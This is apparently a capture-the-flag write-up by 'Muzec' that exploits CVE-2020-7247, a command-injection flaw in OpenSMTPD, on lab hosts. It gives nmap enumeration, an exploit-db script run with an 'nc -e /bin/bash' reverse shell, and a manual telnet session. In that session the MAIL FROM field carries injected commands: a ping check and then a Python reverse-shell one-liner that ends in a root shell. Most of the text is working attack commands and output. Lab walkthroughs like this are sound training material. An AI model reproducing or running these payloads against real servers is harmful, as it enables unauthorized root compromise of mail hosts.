This is a target running a vulnerable OpenSMTPD instance of CVE-2020-7247.
Description
A vulnerability discovered in OpenSMTPD, OpenBSD’s mail server was exploitable since May 2018 (commit a8e222352f, “switch smtpd to new grammar”) and allows an attacker to execute arbitrary shell commands, as root.
Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:26:10 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
Increasing send delay for 10.0.100.33 from 0 to 5 due to 230 out of 766 dropped probes since last increase.
Warning: 10.0.100.33 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.33 from 640 to 1000 due to 108 out of 358 dropped probes since last increase.
Nmap scan report for 10.0.100.33
Host is up (0.15s latency).
Not shown: 40969 closed ports, 24565 filtered ports
PORT STATE SERVICE
25/tcp open smtp
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec 4 09:27:14 2021 -- 1 IP address (1 host up) scanned in 64.35 seconds
What we always do let use some default nmap script and service detection on it.
nmap -sC -sV -oA nmap/normal -p 25 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:28:37 2021 as: nmap -sC -sV -oA nmap -p 25 10.0.100.33
Nmap scan report for 10.0.100.33
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
| smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.0.186], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: CVE-2020-7247.echocity-f.com
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 4 09:28:45 2021 -- 1 IP address (1 host up) scanned in 7.42 seconds
Now let do some research on google and got an exploit on exploit-db already.
Smooth let run it.
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/CVE-2020-7247]
└─$ python3 47984.py 10.0.100.33 25 'nc -e /bin/bash 10.10.0.186 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
Now let check Ncat listener.
We are done.
A QUICK MANUALLY WAY
┌──(muzec㉿kali)-[~/Documents/PTD/10.150.150.188]
└─$ sudo tcpdump ip proto \\icmp -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
└─$ telnet 10.150.150.188 25 1 ⨯
Trying 10.150.150.188...
Connected to 10.150.150.188.
Escape character is '^]'.
220 canyon ESMTP OpenSMTPD
HELO x
250 canyon Hello x [127.0.0.1], pleased to meet you
MAIL FROM:<;ping -c 4 10.66.67.86;>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
muzec
.
250 2.0.0 e5c799d7 Message accepted for delivery
QUIT
221 2.0.0 Bye
Connection closed by foreign host.
We should get a hit back on our tcpdump listener
└─$ sudo tcpdump ip proto \\icmp -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:58:53.425915 IP 10.150.150.188 > kali: ICMP echo request, id 170, seq 1, length 64
00:58:53.425923 IP kali > 10.150.150.188: ICMP echo reply, id 170, seq 1, length 64
00:58:54.433819 IP 10.150.150.188 > kali: ICMP echo request, id 170, seq 2, length 64
00:58:54.433831 IP kali > 10.150.150.188: ICMP echo reply, id 170, seq 2, length 64
00:58:56.462761 IP 10.150.150.188 > kali: ICMP echo request, id 170, seq 4, length 64
00:58:56.462773 IP kali > 10.150.150.188: ICMP echo reply, id 170, seq 4, length 64
┌──(muzec㉿kali)-[~/Documents/PTD]
└─$ telnet 10.150.150.188 25 1 ⨯
Trying 10.150.150.188...
Connected to 10.150.150.188.
Escape character is '^]'.
220 canyon ESMTP OpenSMTPD
HELO X
250 canyon Hello X [127.0.0.1], pleased to meet you
MAIL FROM:<;python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.66.67.86\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")";>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
muzec
.
250 2.0.0 ba87387d Message accepted for delivery
┌──(muzec㉿kali)-[~/Documents/PTD/10.150.150.188]
└─$ sudo nc -nvlp 80
listening on [any] 80 ...
connect to [10.66.67.86] from (UNKNOWN) [10.150.150.188] 51746
root@canyon:~#
Greeting From Muzec